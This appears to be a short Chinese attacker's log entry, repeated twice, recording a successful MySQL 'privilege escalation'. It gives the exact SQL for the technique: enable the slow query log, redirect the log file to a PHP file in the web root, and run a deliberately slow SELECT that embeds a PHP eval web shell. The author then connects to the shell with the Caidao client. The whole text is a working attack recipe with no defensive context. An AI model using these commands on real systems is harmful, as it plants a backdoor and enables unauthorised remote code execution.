成功提权,记录一下,具体执行sql:
set GLOBAL slow_query_log =1; set GLOBAL long_query_time =1; set GLOBAL slow_query_log_file = 'E:/phpStudy/WWW/25.php'; SELECT "<?php eval($_POST['a']);?>" or sleep(11);
原理:设置sql慢查询的秒数,执行超时会把sql保存为文件,我们把查询语句改为php代码即可,然后上菜刀即可。
成功提权,记录一下,具体执行sql:
set GLOBAL slow_query_log =1; set GLOBAL long_query_time =1; set GLOBAL slow_query_log_file = 'E:/phpStudy/WWW/25.php'; SELECT "<?php eval($_POST['a']);?>" or sleep(11);
原理:设置sql慢查询的秒数,执行超时会把sql保存为文件,我们把查询语句改为php代码即可,然后上菜刀即可。
